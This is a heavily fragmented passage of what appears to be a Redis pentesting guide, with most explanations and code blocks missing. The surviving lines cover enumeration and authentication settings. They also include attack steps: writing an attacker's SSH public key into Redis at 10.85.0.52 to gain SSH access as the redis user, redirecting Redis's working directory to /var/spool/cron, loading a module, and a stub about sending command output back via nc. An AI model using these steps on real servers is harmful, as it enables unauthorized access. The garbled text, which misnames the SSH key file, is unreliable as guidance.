nc
or you could also use redis-cli
:info
. It may return output with information about the Redis instance, or something like the following is returned:
requirepass
or temporarily (until the service restarts) by connecting to it and running:
config set requirepass [email protected]$12E45
.
Also, a username can be configured in the parameter masteruser
inside the redis.conf file.
+OK
monitor
or get the top 25 slowest queries with slowlog get 25
info
inside the "Keyspace" chunk:
-WRONGTYPE Operation against a key holding the wrong kind of value
while running GET <KEY>
it's because the key may be something other than a string or an integer and requires a special operator to display it.
TYPE
command, example below for list and hash keys.
config get dir
result can be changed after other manual exploit commands, so it is suggested to run it first, right after logging into Redis. In the output of config get dir
you could find the home of the redis user (usually /var/lib/redis or /home/redis/.ssh), and knowing this you know where you can write the authenticated_users
file to access via ssh with the user redis. If you know the home of another valid user where you have write permissions you can also abuse it:
ssh-keygen -t rsa
(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt
cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key
redis-cli -h 10.85.0.52 config set dir /var/spool/cron/
MODULE LOAD /path/to/mymodule.so
MODULE LIST
MODULE UNLOAD mymodule
whoami
and send back the output via nc
is:
git
scheme and not with the http
scheme.